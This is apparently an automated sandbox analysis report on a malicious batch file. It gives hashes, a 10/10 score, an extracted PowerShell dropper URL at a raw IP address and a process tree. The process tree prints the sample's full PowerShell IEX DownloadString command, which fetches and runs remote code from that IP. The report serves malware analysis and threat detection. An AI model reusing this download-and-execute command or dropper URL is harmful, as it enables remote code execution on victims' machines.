Analysis
-
max time kernel
126s -
max time network
150s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
20-05-2020 23:10
Static task
static1
Behavioral task
behavioral1
Sample
4f6a42934f34216c6420c04766ae463c.bat
Resource
win7v200430
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
4f6a42934f34216c6420c04766ae463c.bat
Resource
win10v200430
windows10_x64
0 signatures
0 seconds
General
-
Target
4f6a42934f34216c6420c04766ae463c.bat
-
Size
218B
-
MD5
d7072273beb15bc6b69f0d896b3c3a67
-
SHA1
252dfb1b0b89545b3b431bfde9c616a85236b34d
-
SHA256
172b87c827469bb03962118ed3294645fa65025b5ed9de5157c0f7d5b4ebef27
-
SHA512
cf89e740f3547dde583dec727b45569f2c3a5d072f01420d64f6bb6651e54dd8c3a3bac098f3fa59f61311e99d65fbde23c1d96562274e1943dc9b28ca69cfdc
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/4f6a42934f34216c6420c04766ae463c
Signatures
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 2160 1880 WerFault.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 2160 WerFault.exe Token: SeBackupPrivilege 2160 WerFault.exe Token: SeDebugPrivilege 2160 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 14 IoCs
Processes:
WerFault.exepid process 2160 WerFault.exe 2160 WerFault.exe 2160 WerFault.exe 2160 WerFault.exe 2160 WerFault.exe 2160 WerFault.exe 2160 WerFault.exe 2160 WerFault.exe 2160 WerFault.exe 2160 WerFault.exe 2160 WerFault.exe 2160 WerFault.exe 2160 WerFault.exe 2160 WerFault.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\4f6a42934f34216c6420c04766ae463c.bat"1⤵PID:1628
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/4f6a42934f34216c6420c04766ae463c');Invoke-EPKZRFQOIDB;Start-Sleep -s 10000"2⤵PID:1880
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1880 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:2160